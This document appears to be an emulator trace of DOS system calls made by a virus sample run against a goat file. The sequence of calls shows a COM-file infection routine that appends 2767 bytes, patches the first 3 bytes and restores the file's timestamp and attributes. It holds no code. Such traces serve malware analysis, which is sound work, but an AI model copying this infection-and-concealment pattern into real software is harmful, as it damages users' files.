2018-12-25T11:52:09.623821228Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.632972027Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.634649417Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.63923367Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.647615155Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.661854536Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.681547164Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.683180474Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.706895462Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.72637788Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.728008235Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.731023775Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.738666457Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.74844841Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.755812774Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.758709955Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.765890426Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:09.767601096Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:09.771512414Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:09.773243417Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:09.779080421Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.787651914Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:09.790032899Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:09.798527229Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:09.800894028Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:09.804927924Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:09.806584971Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:09.809027034Z 62 PC: 1448c | Close file
2018-12-25T11:52:09.817131444Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:09.826906744Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.832389745Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.844205209Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.847067746Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:09.853427984Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:09.855550678Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:09.866146983Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:09.869427931Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:09.873381069Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')